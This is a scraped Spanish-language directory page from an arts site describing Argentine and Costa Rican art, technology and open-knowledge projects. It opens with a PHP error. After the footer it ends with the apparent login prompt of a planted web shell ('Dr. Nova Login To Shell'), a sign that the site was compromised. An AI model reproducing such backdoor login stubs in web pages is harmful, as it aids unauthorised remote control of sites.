Argentina

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Programa Arte y Tecnología – Espacio Fundación Telefónica

País: 

El programa Arte y Tecnología de la Fundación Telefónica en Argentina está basado en la Ciudad de Buenos Aires en el Espacio Fundación Telefónica, un edificio propio. Constituye un fuerte foco en la articulación de proyectos en arte, ciencia y tecnología. Tienen tres programas centrales.

Compartiendo Capital

País: 
Categorías: 

Compartiendo Capital es una plataforma cuyo objetivo es fomentar la ditribución libre de conocimientos. Es una traslación de la lógica del Open Source a las Artes Visuales.

Fábrica de Fallas - Festival de Cultura Libre y Copyleft

País: 

La Tribu es una radio que cuenta veinte años de vida, tiene un espacio físico bastante amplio en el que funciona un bar donde se amplifica lo que se emite en la radio.

Taller Interactivos

País: 
Categorías: 

El Taller Interactivos del Espacio Fundación Telefónica de Buenos Aires es un programa creado para la discusión de proyectos artísticos ligados con las nuevas tecnologías. Básicamente, producciones interactivas que estén pensadas como proyectos artísticos.

Sulá Batsú COSTA RICA

País: 

Sulá Batsú es una cooperativa de autogestión que ofrece servicios y productos de conocimiento. Realizan facilitaciones de construcción colectiva de conocimiento y usan estratégicamente las TICs para apoyar procesos de orden sociocultural. Su labor se organiza en tres grandes áreas de trabajo: 1.

Subscribe to RSS - Argentina
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |